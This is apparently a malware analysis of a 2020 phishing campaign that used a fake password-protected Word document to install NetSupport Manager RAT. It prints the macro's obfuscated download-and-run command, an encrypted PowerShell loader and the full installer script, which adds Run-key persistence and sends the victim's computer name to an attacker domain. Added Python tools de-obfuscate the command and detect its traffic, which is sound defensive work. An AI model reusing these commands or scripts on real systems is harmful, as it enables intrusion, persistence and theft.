NetSupport Manager RAT Phishing Attack Analysis
In January 2020, security researchers discovered a malicious Microsoft Word document, disguised as a password-protected file, being used in a phishing campaign to deliver a commercial remote-access tool, NetSupport Manager. The RAT is normally used by administrators to reach client machines remotely; here the attackers install it on the victim's system to obtain that access for themselves. The campaign uses several techniques to evade dynamic and static analysis, and relies on PowerShell and the PowerSploit framework to carry out the installation of the malicious files. NetSupport Manager RAT has appeared in phishing campaigns since at least 2018.
Delivery Method
In early January 2020 a suspicious winword.exe process was detected executing a batch file. Figure 1 shows several detection points, starting with the launch of Microsoft Word and ending with the creation and execution of the .bat file. Figure 2 shows the timeline, with the detection alerts, the behavioural process flow and the connection attempts. Figure 3 shows the initial alert raised on the basis of these behavioural indicators.
Figure 4 below is a screenshot of the malicious document. It masquerades as a password-protected NortonLifeLock document and asks the user to enter a password in order to enable macros. The document used for this analysis has the following SHA256 hash (as reproduced here it is 62 hex characters, two short of a full SHA256, so confirm it against the original report before using it as an indicator):
SHA256: e9440a5d2de2453ae5b69a9c096f8d4cf9e059469c5de67380d76e02dd6975
To the user, the document appears to contain personal information that requires a password to view. Once the document is opened and the user clicks "Enable Content", the macro runs and presents the user with a password dialog.
The password was most likely given in the body of the phishing email; the dialog accepts only the letter "c" or "C", as the macro code shows. The SHA256 of the macro code is:
SHA256: 68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2
If the user enters an incorrect password, an error message is shown, followed by a "Done" processing message. No malicious activity takes place until the correct key is entered; once it is, the macro continues and builds the following command string:
cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^quickwaysignstx[.]com/view.php ">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q &exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2
The macro obfuscates the string by spreading it across several labels on a Visual Basic for Applications (VBA) form; the characters are finally concatenated to build the final command, which downloads and executes the RAT on the victim's machine.
The command string is executed through the VBA Shell function and does the following:
1. Launches cmd.exe with the /c switch, so that it runs the command and then exits
2. Builds a batch file named alpaca.bat in the victim's %temp% directory
3. Executes the newly created batch script
The batch script uses msiexec, part of the Windows Installer service, to download and install a binary from:
quickwaysignstx[.]com/view.php
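The command string above hides the msiexec invocation twice: the top-level cmd line escapes characters with carets outside the quotes, and the quoted fragments written with echo|set /p keep their own carets, so the file that lands on disk still reads "M^siexe" + "c" rather than "msiexec" until the batch parser consumes the carets a second time. The following Python is an added analyst-side example, not code from the original report or from the sample; it models cmd.exe's quote and caret rules (carets are literal inside double quotes and are consumed outside them) and replays the set /p redirections to show what %temp%\alpaca.bat contains on disk and what it actually runs. The model is an assumption about cmd's parsing, not output captured from the sample.

```python
"""De-obfuscate the macro's cmd string and reconstruct what alpaca.bat contains."""
import re

# The command string the macro builds, copied from the analysis above.
MACRO_CMD = (
    r'cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat'
    r'&EcHo|s^et /p="c " >>%temp%\alpaca.bat'
    r'&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat'
    r'&EcHo|s^et /p=" http^:^/^/^quickwaysignstx[.]com/view.php ">>%temp%\alpaca.bat'
    r'&EcHo|s^et /p=" ^/q &exit">>%temp%\alpaca.bat'
    r'&%temp%\alpaca.bat&avvfge 2'
)

# echo|set /p="fragment" >file  (or >>file): writes the prompt text without a newline
SET_P = re.compile(r'(?i)\bset\s+/p\s*=\s*"([^"]*)"\s*(>>?)\s*(\S+)')


def cmd_unescape(line):
    """cmd.exe's escape rule: outside double quotes '^' escapes the next character
    and disappears; inside quotes every character (carets included) is literal."""
    out, in_quote, i = [], False, 0
    while i < len(line):
        c = line[i]
        if c == '"':
            in_quote = not in_quote
        elif c == "^" and not in_quote and i + 1 < len(line):
            i += 1
            c = line[i]
        out.append(c)
        i += 1
    return "".join(out)


def split_commands(line):
    """Split on '&' separators that are not inside double quotes."""
    parts, cur, in_quote = [], [], False
    for c in line:
        if c == '"':
            in_quote = not in_quote
        if c == "&" and not in_quote:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(c)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def reconstruct_files(cmd_string):
    """Replay every set /p redirection: '>' truncates the target, '>>' appends.
    Returns ({target: on-disk contents}, [commands that are not file writes])."""
    files, others = {}, []
    for cmd in split_commands(cmd_unescape(cmd_string)):
        m = SET_P.search(cmd)
        if not m:
            others.append(cmd)
            continue
        fragment, mode, target = m.groups()
        files[target] = fragment if mode == ">" else files.get(target, "") + fragment
    return files, others


def effective_commands(batch_contents):
    """What the dropped batch file runs: the batch parser consumes the carets a
    second time (the file contains no quotes), then each line splits on '&'.
    Whitespace is normalised so the result is easy to compare."""
    cmds = []
    for line in batch_contents.splitlines():
        cmds.extend(" ".join(c.split()) for c in split_commands(cmd_unescape(line)))
    return cmds


if __name__ == "__main__":
    dropped, remaining = reconstruct_files(MACRO_CMD)
    for target, contents in dropped.items():
        print(f"{target} on disk: {contents!r}")
        print("runs:", effective_commands(contents))
    print("other commands:", remaining)
```

Two things fall out for detection: the on-disk batch file never contains the literal string "msiexec" or "http://", so a content rule on the dropped file needs to strip carets first, while the process tree still shows cmd.exe writing %temp%\alpaca.bat and then msiexec.exe fetching a remote MSI, which is the more robust signal.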
If the User-Agent string in the request is "Windows Installer", the server returns an MSI file. The MSI payload (SHA256 as reproduced here: 41d27d53c5d41003bc9913476a3afd3961b561b1201bee8bfde327a5f0d22a040a, which is 66 hex characters, two more than a SHA256, so verify it against the original report) was generated with an unregistered version of the wrapper from www.exemsi[.]com and carries the title "MPZMZQYVXO patch version 5.1". The version string is randomised and is displayed when the MSI runs. Once downloaded, the MSI is executed with the /q (quiet) switch. The MSI installs the PowerShell script REgistryMPZMZQYVXO.ps1 in the victim's %temp% directory:
function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP) {
    $DHPFYCOKLM = "<base64 encoded + encrypted payload>";
    $encoding = New-Object System.Text.ASCIIEncoding;
    $KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD");   # IV, passed as a 16-byte literal
    $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, $encoding.GetBytes($BORBFDSYOP), "SHA1", 2);
    [Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);        # 3DES key derived from password + salt (SHA1, 2 iterations)
    $LCZJFEXHXR = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider;
    $LCZJFEXHXR.Mode = [System.Security.Cryptography.CipherMode]::CBC;
    $JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);
    # The next two statements are missing from the copy reproduced on this page; they are restored
    # from the Out-EncryptedScript stub layout so that the variables used below are defined.
    $DHPFYCOKLMa = [System.Convert]::FromBase64String($DHPFYCOKLM);
    [Byte[]] $JHTZWEZBUW = New-Object Byte[]($DHPFYCOKLMa.Length);
    $LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, $True);
    $ZSKXKODPKK = New-Object System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, $JOVGMJCIKY, [System.Security.Cryptography.CryptoStreamMode]::Read);
    $STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, $JHTZWEZBUW.Length);
    $LBUWDFHHMZ.Close();
    $ZSKXKODPKK.Close();
    $LCZJFEXHXR.Clear();
    if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) -and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) {
        $h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)];       # UTF-8 BOM stripped into $h, which is never used
    }
    return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);   # buffer is ciphertext-sized, so trailing NULs are trimmed
}
$TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" "7ohp9z481qem6ykbdu2argt5lj3fcsi0";
Invoke-Expression $TYCNJNUWWG;
The encrypted data blob stored in REgistryMPZMZQYVXO.ps1 is another PowerShell script, which is responsible for installing the NetSupport Manager RAT on the victim.
The PowerShell script was generated with Out-EncryptedScript.ps1, an open-source script from the PowerSploit framework. It carries the payload as base64 data and encrypts it with TripleDES in CBC mode.
The decryption key and initialisation vector (IV) for this sample are:
Decryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12
IV = DJZGVUGVHDMNIGZD
The key itself is not stored in the script: it is derived at run time by PasswordDeriveBytes (SHA1, two iterations) from the two string arguments passed to the function, "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" as the password and "7ohp9z481qem6ykbdu2argt5lj3fcsi0" as the salt, while the IV is the literal string visible in the script.
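To recover the key offline without running the stub, the PasswordDeriveBytes call can be re-implemented: for outputs of 20 bytes or less it is PBKDF1, that is SHA1 over password||salt re-hashed (iterations - 1) times and truncated. The Python below is an added example, not code from the report or from PowerSploit. It assumes .NET Framework semantics for PasswordDeriveBytes, and, for the decryption helper, that the 16-character IV the stub passes is truncated to the 8-byte TripleDES block size by the .NET CAPI provider (an assumption to confirm against the sample; .NET Core rejects such an IV outright). The decryption helper needs the third-party "cryptography" package and is not exercised by the key-derivation check.

```python
"""Re-derive the 3DES key of the Out-EncryptedScript stub from its two string arguments."""
import base64
import hashlib

# Arguments the stub passes to HYTNKJSDEH, and the IV literal inside it (from the script above).
STUB_PASSWORD = "ew9p5rzlmvcf32b6i0oun8q47tag1xhs"
STUB_SALT = "7ohp9z481qem6ykbdu2argt5lj3fcsi0"
STUB_IV = "DJZGVUGVHDMNIGZD"


def password_derive_bytes(password, salt, iterations=2, length=16):
    """Emulates .NET PasswordDeriveBytes(password, saltBytes, "SHA1", iterations).GetBytes(length)
    for length <= 20, i.e. PBKDF1: SHA1(password||salt), re-hashed iterations-1 times, truncated.
    Strings are ASCII-encoded exactly as the stub's System.Text.ASCIIEncoding does."""
    if not 1 <= length <= 20:
        raise ValueError("a single PBKDF1/SHA1 call yields at most 20 bytes")
    block = hashlib.sha1(password.encode("ascii") + salt.encode("ascii")).digest()
    for _ in range(iterations - 1):
        block = hashlib.sha1(block).digest()
    return block[:length]


def stub_key_hex():
    """Key for this sample, to compare with the value the analysis reports above."""
    return password_derive_bytes(STUB_PASSWORD, STUB_SALT).hex().upper()


def decrypt_stub_payload(blob_b64, key, iv):
    """TripleDES-CBC decryption of the stub's base64 blob (requires the 'cryptography' package).
    Assumption: the stub hands .NET a 16-byte IV although 3DES has an 8-byte block, and the
    .NET Framework CAPI provider uses only the first 8 bytes, so the same is done here."""
    try:
        from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
    except ImportError:  # releases before the 'decrepit' namespace existed
        from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, modes

    decryptor = Cipher(TripleDES(key), modes.CBC(iv[:8])).decryptor()
    padded = decryptor.update(base64.b64decode(blob_b64)) + decryptor.finalize()
    unpadder = padding.PKCS7(64).unpadder()             # .NET's default PaddingMode.PKCS7
    data = unpadder.update(padded) + unpadder.finalize()
    if data.startswith(b"\xef\xbb\xbf"):                 # UTF-8 BOM the stub tests for
        data = data[3:]
    return data.decode("utf-8")


if __name__ == "__main__":
    print("derived key:", stub_key_hex())
    # decrypt_stub_payload("<blob from the .ps1>", password_derive_bytes(STUB_PASSWORD, STUB_SALT),
    #                      STUB_IV.encode("ascii")) returns the installer script as text.
```

Because the key is a function of two strings that sit in clear text next to the blob, "encryption" here buys the attacker nothing against an analyst; its purpose is purely to keep the installer out of static scanners until Invoke-Expression runs.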
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
if ($scriptpath -match "avast") {exit}
if ($scriptpath -match "Avast") {exit}
if ($scriptpath -match "AVG") {exit}
if ($scriptpath -match "avg") {exit}
function react ( $source, $destination ) {
    Convert-StringToBinary -InputString $source -FilePath $Destination;
    # }
}
#}
function Convert-StringToBinary ( $InputString , $FilePath ) {
    $file= $InputString
    $data = [System.Convert]::FromBase64String($file)
    $ms = New-Object System.IO.MemoryStream
    $ms.Write($data, 0, $data.Length)
    $ms.Seek(0,0) | Out-Null
    $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
    $sr = New-Object System.IO.StreamReader($cs)
    $t = $sr.readtoend()#|out-file str.txt
    $ByteArray = [System.Convert]::FromBase64String($t);
    [System.IO.File]::WriteAllBytes($FilePath, $ByteArray);
}
function Install {
    $file1 = "<Gzip compressed + base64 encoded file>";
    $file2 = "<Gzip compressed + base64 encoded file>";
    $file3 = "<Gzip compressed + base64 encoded file>";
    $file4 = "<Gzip compressed + base64 encoded file>";
    $file5 = "<Gzip compressed + base64 encoded file>";
    $file6 = "<Gzip compressed + base64 encoded file>";
    $file7 = "<Gzip compressed + base64 encoded file>";
    $file8 = "<Gzip compressed + base64 encoded file>";
    $file9 = "<Gzip compressed + base64 encoded file>";
    $file10 = "<Gzip compressed + base64 encoded file>";
    $file11 = "<Gzip compressed + base64 encoded file>";
    $file12 = "<Gzip compressed + base64 encoded file>";
    $randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) )
    $fpath ="$env:appdata\$randf"
    mkdir $fpath
    $clientname="presentationhost.exe"
    $Source = $file1
    $Destination = "$fpath\"+"$clientname"
    react -source $source -destination $destination
    $Source = $file2
    $Destination = "$fpath\client32.ini"
    write-host $destination
    react -source $source -destination $destination
    $Source = $file3
    $Destination = "$fpath\HTCTL32.DLL"
    react -source $source -destination $destination
    $Source = $file4
    $Destination = "$fpath\msvcr100.dll"
    react -source $source -destination $destination
    $Source = $file5
    $Destination = "$fpath\nskbfltr.inf"
    react -source $source -destination $destination
    $Source = $file6
    $Destination = "$fpath\NSM.ini"
    react -source $source -destination $destination
    $Source = $file7
    $Destination = "$fpath\NSM.lic"
    react -source $source -destination $destination
    $Source = $file8
    $Destination = "$fpath\pcicapi.dll"
    react -source $source -destination $destination
    $Source = $file9
    $Destination = "$fpath\PCICHEK.DLL"
    react -source $source -destination $destination
    $Source = $file10
    $Destination = "$fpath\PCICL32.DLL"
    react -source $source -destination $destination
    $Source = $file11
    $Destination = "$fpath\remcmdstub.exe"
    react -source $source -destination $destination
    $Source = $file12
    $Destination = "$fpath\TCCTL32.DLL"
    react -source $source -destination $destination
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f
    start-process "$fpath\$clientname"
    #Start-sleep -s 10
    Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername"
    $f=get-content $env:temp\insghha4.txt
    remove-item $env:TEMP\*.ps1
    #cmd /c del %temp%\*.ps1 /f
    #cmd /c del %temp%\*.txt /f
    remove-item $f
}
#ShowConsole
#rights
install;
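Each of the twelve $fileN blobs is the file's bytes base64-encoded, gzip-compressed, and base64-encoded again, which is what Convert-StringToBinary unwinds. The Python below is an added example, not code from the report or the sample: it reverses that encoding, pairs each blob with the $Destination the installer writes it to (resolving the "$fpath\"+"$clientname" case for the renamed client), and hashes the results so they can be used as indicators. Because the real blobs are not reproduced on this page, the input is a constructed stand-in built with a helper that applies the same encoding; the pairing regexes assume the one-line "$Source = $fileN $Destination = ... react" layout shown above.

```python
"""Unpack the files the installer carries as base64(gzip(base64(bytes))) blobs."""
import base64
import gzip
import hashlib
import re

# $fileN = "<blob>";  assignments inside function Install
ASSIGN_RE = re.compile(r'\$(file\d+)\s*=\s*"([A-Za-z0-9+/=]+)"\s*;')
# $Source = $fileN  $Destination = <expr>  [write-host $destination]  react ...
PAIR_RE = re.compile(
    r'\$Source\s*=\s*\$(file\d+)\s+\$Destination\s*=\s*([^\n]+?)\s+(?:write-host\s+\$destination\s+)?react\b',
    re.I,
)
CLIENT_RE = re.compile(r'\$clientname\s*=\s*"([^"]+)"', re.I)


def unpack_blob(blob):
    """Mirror of Convert-StringToBinary: base64 -> gunzip -> base64 -> file bytes."""
    inner_b64 = gzip.decompress(base64.b64decode(blob))
    return base64.b64decode(inner_b64)


def pack_like_installer(raw):
    """Constructed inverse (not part of the sample), used only to build test input."""
    return base64.b64encode(gzip.compress(base64.b64encode(raw))).decode("ascii")


def resolve_destination(expr, clientname):
    """Turn '"$fpath\\client32.ini"' or '"$fpath\\"+"$clientname"' into a bare file name."""
    expr = expr.replace('"', "").replace("+", "").replace("$clientname", clientname)
    return expr.split("\\")[-1]


def extract_dropped_files(script):
    """Pair each $fileN blob with the $Destination it is written to and decode it."""
    blobs = dict(ASSIGN_RE.findall(script))
    m = CLIENT_RE.search(script)
    if m is None:
        raise ValueError("no $clientname assignment found in script")
    dropped = {}
    for var, dest_expr in PAIR_RE.findall(script):
        if var in blobs:
            dropped[resolve_destination(dest_expr, m.group(1))] = unpack_blob(blobs[var])
    return dropped


def sha256_report(dropped):
    """SHA256 of every decoded file, ready to pivot on as indicators."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in dropped.items()}


# Constructed stand-in for the decrypted installer, in the same layout as the script above;
# the file contents are placeholders, not bytes from the sample.
SAMPLE_INSTALLER = (
    '$file1 = "%s";\n$file2 = "%s";\n'
    '$clientname="presentationhost.exe"\n'
    '$Source = $file1 $Destination = "$fpath\\"+"$clientname" react -source $source -destination $destination\n'
    '$Source = $file2 $Destination = "$fpath\\client32.ini" write-host $destination react -source $source -destination $destination\n'
) % (
    pack_like_installer(b"MZ\x90\x00 constructed placeholder, not a real PE"),
    pack_like_installer(b"[Client]\r\n; constructed placeholder configuration\r\n"),
)

if __name__ == "__main__":
    for name, digest in sha256_report(extract_dropped_files(SAMPLE_INSTALLER)).items():
        print(f"{name}: {digest}")
```

Running this over the real decrypted script yields the twelve NetSupport components with their hashes; note that apart from client32.ini and NSM.lic these are the vendor's signed binaries, so the hashes identify the NetSupport build rather than the campaign, and the configuration file is the artefact worth diffing.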
The RAT installation script does the following:
1. Aborts the installation if Avast or AVG is present on the target. Note that the script tests the path it is running from for "avast", "Avast", "AVG" or "avg", not the process list, so it is the script's own location that triggers the exit.
2. Writes the 12 files that make up NetSupport Manager RAT into a randomly named directory (8 alphanumeric characters) under the victim's %appdata%, for example C:\Users\%username%\AppData\Roaming\%randomvalue%
3. Creates the following registry value on the victim under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run:
Name: ServiceDLL
Value: C:\Users\%username%\AppData\Roaming\%randomvalue%\presentationhost.exe
4. Executes the main NetSupport Manager RAT binary, presentationhost.exe
5. Sleeps for 10 seconds (in the recovered script the Start-sleep line is commented out, so this step does not actually run)
6. Sends the victim's computer name to http://afsasdfa33[.]xyz/iplog/lepo.php?hst=%computername%
7. Any data returned from afsasdfa33[.]xyz is saved in the %temp% directory as insghha4.txt
8. Deletes every file with a .ps1 extension from the victim's %temp% directory
9. Deletes the file named insghha4.txt (the recovered script reads the file with get-content into $f and then calls remove-item $f)
Once NetSupport Manager (presentationhost.exe) starts, it queries the domain geo.netsupportsoftware[.]com to geolocate the host; this is the vendor's own endpoint, so that lookup alone does not distinguish this campaign from a licensed deployment. The NetSupport Manager client binary is originally named client32.exe; it was renamed to presentationhost.exe to avoid arousing the victim's suspicion. A sample of the traffic follows:
POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 94.158.245[.]182
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
Response:
HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Connection: Keep-Alive
CMD=ENCD
ES=1
DATA=.g+$.{.. \….W…bb…).w}..o..X..xf…
Encrypted data sent by the victim:
POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
Host: 94.158.245[.]182
Connection: Keep-Alive
CMD=ENCD
ES=1
DATA=u.2h.r..4.]..%y-…..=I…D3.W..i.7?….=@….F.f….&t.[..6ra..L..Tzg..... ..U.z4.]..%y-A9H=n .:!."Pfd]U,[.(...f=I.....W.p..RHz.....#..@.....>|.?...R...s.nt.G..=}\[…][…]……..M.6..
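The captures above give the protocol-level tells of a NetSupport gateway session: a POST to /fakeurl.htm on a bare IP, the "NetSupport Manager/1.3" User-Agent, the "NetSupport Gateway/1.6" Server header, and a body of KEY=VALUE lines whose CMD is POLL or ENCD. The Python below is an added example, not code from the report; it parses raw HTTP messages and scores those indicators, and it also checks a Run-key value against the persistence from step 3 of the installation list above. The POLL request and gateway response are reproduced from the page (with the 60-byte ciphertext omitted); the benign request is constructed as a negative control. Because NetSupport Manager is legitimate software, the verdict requires at least two indicators rather than the User-Agent alone.

```python
"""Flag NetSupport gateway traffic and the Run-key persistence described in this report."""
import re

# Captured POLL request from the analysis above, with CRLF line endings.
POLL_REQUEST = (
    "POST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\n"
    "User-Agent: NetSupport Manager/1.3\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 22\r\n"
    "Host: 94.158.245[.]182\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "CMD=POLL\r\nINFO=1\r\nACK=1\r\n"
)
# Gateway response from the analysis above; the ciphertext is not reproduced.
GATEWAY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: NetSupport Gateway/1.6 (Windows NT)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 60\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "CMD=ENCD\r\nES=1\r\nDATA=<ciphertext omitted>\r\n"
)
# Constructed benign request (not from the report), used as a negative control.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.com\r\n"
    "\r\n"
)

UA_RE = re.compile(r"^NetSupport Manager/", re.I)
SERVER_RE = re.compile(r"^NetSupport Gateway/", re.I)
# Bare IPv4 Host header, defanged ("[.]") or not, with an optional port.
IPV4_HOST_RE = re.compile(r"^\d{1,3}(?:\[?\.\]?\d{1,3}){3}(?::\d+)?$")
# Run value written by the installer: 8 random alphanumerics under AppData\Roaming.
RUN_DATA_RE = re.compile(r"\\AppData\\Roaming\\[0-9A-Za-z]{8}\\presentationhost\.exe$", re.I)


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def body_fields(body):
    """The gateway protocol body is KEY=VALUE per line (CMD, INFO, ACK, ES, DATA)."""
    fields = {}
    for line in body.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value
    return fields


def netsupport_indicators(raw):
    """Return the protocol indicators present in one HTTP message, in a fixed order."""
    start, headers, body = parse_http(raw)
    hits = []
    if UA_RE.match(headers.get("user-agent", "")):
        hits.append("ua:netsupport-manager")
    if SERVER_RE.match(headers.get("server", "")):
        hits.append("server:netsupport-gateway")
    if not start.startswith("HTTP/"):                       # a request, not a response
        method, target = start.split(" ")[:2]
        if method == "POST" and target.lower().endswith("/fakeurl.htm"):
            hits.append("uri:fakeurl.htm")
    if IPV4_HOST_RE.match(headers.get("host", "")):
        hits.append("host:raw-ip")
    cmd = body_fields(body).get("CMD")
    if cmd in ("POLL", "ENCD"):
        hits.append("body:CMD=" + cmd)
    return hits


def is_netsupport_c2(raw, min_hits=2):
    """Alert only on a combination of indicators; the User-Agent alone also appears
    in legitimate NetSupport deployments."""
    return len(netsupport_indicators(raw)) >= min_hits


def suspicious_run_value(name, data):
    """Match the persistence from step 3: a Run value named ServiceDLL, or data pointing
    at presentationhost.exe in an 8-character directory under AppData\\Roaming."""
    return name == "ServiceDLL" or bool(RUN_DATA_RE.search(data))
```

In a proxy log the same logic reduces to: POST with a bare-IP Host, a path ending in fakeurl.htm, and a NetSupport User-Agent from a workstation that has no sanctioned NetSupport deployment; the Run-key check is the host-side pivot that confirms which machines were actually installed.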
Summary
The campaign ran from early November 2019 to late January 2020. Throughout the first half of November, all related activity used email attachments named after individuals or public figures with a publicly known connection to the target company. All emails were sent from random protonmail[.]com addresses, with subjects relating to refund status or unauthorised transactions. From late November through January 2020 the attachment changed to a file named <target company website>.doc, with the same email subjects. The intent behind the attacks is still unclear.
*Source: Unit 42; compiled by Kriston. Please credit FreeBuf.COM when reposting.